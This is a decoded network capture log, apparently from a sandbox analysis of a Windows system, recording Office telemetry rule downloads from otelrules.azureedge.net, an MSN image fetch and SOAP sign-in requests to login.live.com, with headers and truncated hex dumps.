                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        135192.168.2.54992813.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:59 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                        x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234959Z-178bfbc474bnwsh4hC1NYC2ubs00000000u0000000007p92
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        136192.168.2.54992913.107.246.454437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:59 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                        x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234959Z-1777c6cb754wcxkwhC1TEB3c6w0000000a6g00000000frfx
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        137192.168.2.54993123.57.90.1014437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:59 UTC505OUTGET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                        Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                        Last-Modified: Tue, 29 Oct 2024 19:03:22 GMT
                                                                                                                                                                                                                                                        X-Source-Length: 95457
                                                                                                                                                                                                                                                        X-Datacenter: westus
                                                                                                                                                                                                                                                        X-ActivityId: 155cd87c-435f-4d80-bfaf-3f0e9ec39163
                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                        X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                        Content-Length: 8192
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=69853
                                                                                                                                                                                                                                                        Expires: Thu, 21 Nov 2024 19:14:13 GMT
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:00 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                        Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        138192.168.2.54993040.126.31.71443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                        Content-Length: 4775
                                                                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                        Expires: Wed, 20 Nov 2024 23:49:00 GMT
                                                                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        x-ms-route-info: C515_BL2
                                                                                                                                                                                                                                                        x-ms-request-id: f04b8a03-0fa3-45c3-b1d0-b9c97416622e
                                                                                                                                                                                                                                                        PPServer: PPV: 30 H: BL02EPF0001D7B4 V: 0
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:59 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Length: 11409
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC11409INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        139192.168.2.54993213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:00 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:01 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                        x-ms-request-id: b992c0cc-401e-0048-5ef2-3a0409000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235001Z-r1d97b9957744xz5hC1TEB5bf800000009f0000000009ynf
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        140192.168.2.54993313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:01 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                        x-ms-request-id: 848b8d5b-d01e-00a1-7163-3b35b1000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235001Z-178bfbc474bnwsh4hC1NYC2ubs00000000ng000000017a7k
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        141192.168.2.54993413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:01 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                        x-ms-request-id: 6a1e2df9-c01e-008d-338c-3a2eec000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235001Z-1777c6cb754b7tdghC1TEBwwa40000000ac000000000m8kx
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        142192.168.2.54993513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:50:01 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:50:01 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                        x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T235001Z-1777c6cb754xrr98hC1TEB3kag0000000a7g000000002132
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:50:02 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
